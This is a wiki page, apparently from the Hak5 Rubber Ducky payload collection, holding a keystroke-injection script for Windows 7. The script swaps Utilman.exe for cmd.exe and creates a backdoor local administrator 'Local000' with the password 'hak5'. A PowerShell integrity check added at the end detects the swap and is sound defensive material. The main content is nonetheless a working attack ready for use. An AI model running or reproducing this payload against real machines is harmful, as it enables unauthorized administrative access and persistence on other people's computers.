Payload utilman exploit

hak5darren edited this page Feb 4, 2012 · 1 revision

Author: Xcellerator (props to Jay Kruer's Fork Bomb script for the UAC bypass technique!)

Duckencoder: 1.0

Target: Windows 7

Description: Uses the Utilman.exe exploit to create a new local administrator account "Local000" with the password "hak5".

```text
REM Author: Xcellerator
REM Description: Utilman Exploiter to create a new Admin Account
REM The new account will be called "Local000".
REM Phase 1: open an elevated command prompt (Start menu, context menu, "Run as administrator", UAC prompt)
GUI
DELAY 50
STRING cmd
MENU
STRING a
ENTER
LEFT
ENTER
DELAY 200
REM Phase 2: take ownership of Utilman.exe, grant Administrators full control, and swap in a copy of cmd.exe
STRING takeown /f "%systemroot%\System32\Utilman.exe"
ENTER
DELAY 50
STRING icacls "%systemroot%\System32\Utilman.exe" /grant administrators:F /T
ENTER
DELAY 50
STRING cd %systemroot%\System32
ENTER
DELAY 50
STRING mkdir util
ENTER
STRING xcopy cmd.exe util\
ENTER
DELAY 50
STRING ren Utilman.exe Utilman.exe.bak
ENTER
STRING cd util
ENTER
DELAY 50
STRING ren cmd.exe Utilman.exe
ENTER
DELAY 50
STRING cd ..
ENTER
DELAY 50
STRING xcopy util/Utilman.exe \
ENTER
DELAY 50
STRING rmdir /s /q util
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Phase 3: launch the swapped Utilman via Win+U and create the account
GUI u
STRING net user Local000 /add
ENTER
DELAY 50
STRING net localgroup administrators Local000 /add
ENTER
DELAY 50
STRING exit
ENTER
DELAY 50
REM Phase 4: remove the swapped binary and restore the original Utilman.exe from the backup
GUI r
STRING cmd
ENTER
DELAY 50
STRING cd "%systemroot%\System32"
ENTER
DELAY 50
STRING delete Utilman.exe
ENTER
DELAY 50
STRING y
ENTER
DELAY 50
STRING ren Utilman.exe.bak Utilman.exe
ENTER
DELAY 50
STRING exit
ENTER
REM Phase 5: open another elevated prompt and set the password for Local000
GUI
STRING cmd
MENU
STRING a
ENTER
DELAY 50
LEFT
ENTER
DELAY 200
STRING net user Local000 *
ENTER
STRING hak5
ENTER
STRING hak5
ENTER
STRING exit
ENTER
```
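The payload above leaves several traces a defender can check for: a Utilman.exe that is really cmd.exe, an owner other than TrustedInstaller plus a FullControl ACE for Administrators, a leftover Utilman.exe.bak, and a new member of the local Administrators group (also visible in the Security log as events 4720 and 4732). The following host check is an added example and not part of the original page or the Hak5 project; it assumes PowerShell 5.1 or later (for Get-LocalGroupMember and catalog-signature verification), an elevated prompt, and a baseline admin list you adjust for the host.

```powershell
# Added defender-side integrity check for the Utilman.exe swap described above.
# Assumes PowerShell 5.1+ and an elevated session; not part of the original payload.
$sys32    = Join-Path $env:SystemRoot 'System32'
$utilman  = Join-Path $sys32 'Utilman.exe'
$findings = @()

# 1. The binary must be Microsoft-signed and identify itself as utilman.exe, not cmd.exe.
#    (System binaries are catalog-signed; Get-AuthenticodeSignature resolves that on PS 5.1+.)
$sig = Get-AuthenticodeSignature -FilePath $utilman
if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notmatch 'Microsoft') {
    $findings += "Utilman.exe signature is '$($sig.Status)', signer '$($sig.SignerCertificate.Subject)'"
}
$orig = (Get-Item $utilman).VersionInfo.OriginalFilename
if ($orig -notmatch '^utilman\.exe$') {
    $findings += "Utilman.exe reports OriginalFilename '$orig' (expected utilman.exe; cmd.exe reports Cmd.Exe)"
}

# 2. takeown moves ownership away from TrustedInstaller; icacls adds a FullControl ACE for Administrators.
$acl = Get-Acl -Path $utilman
if ($acl.Owner -ne 'NT SERVICE\TrustedInstaller') {
    $findings += "Utilman.exe owner is '$($acl.Owner)' (expected NT SERVICE\TrustedInstaller)"
}
$fullCtl = $acl.Access | Where-Object {
    $_.IdentityReference -like '*\Administrators' -and $_.FileSystemRights -eq 'FullControl'
}
if ($fullCtl) { $findings += 'Administrators hold FullControl on Utilman.exe (default is ReadAndExecute)' }

# 3. The payload renames the original to Utilman.exe.bak and may fail to clean it up.
if (Test-Path (Join-Path $sys32 'Utilman.exe.bak')) { $findings += 'Utilman.exe.bak present in System32' }

# 4. A new local administrator was added; flag any user not in the host's expected baseline.
$expectedAdmins = @('Administrator')   # assumption: replace with this host's known admin accounts
foreach ($m in Get-LocalGroupMember -Group 'Administrators') {
    $name = ($m.Name -split '\\')[-1]
    if ($m.ObjectClass -eq 'User' -and $name -notin $expectedAdmins) {
        $findings += "Unexpected local administrator: $($m.Name)"
    }
}

if ($findings) { $findings | ForEach-Object { Write-Warning $_ } }
else           { Write-Output 'Utilman.exe integrity checks passed' }
```

Restoring a clean Utilman.exe means copying it back from installation media or `sfc /scannow`, then resetting ownership to TrustedInstaller; a simple rename of the .bak file does not undo the ACL change the payload made.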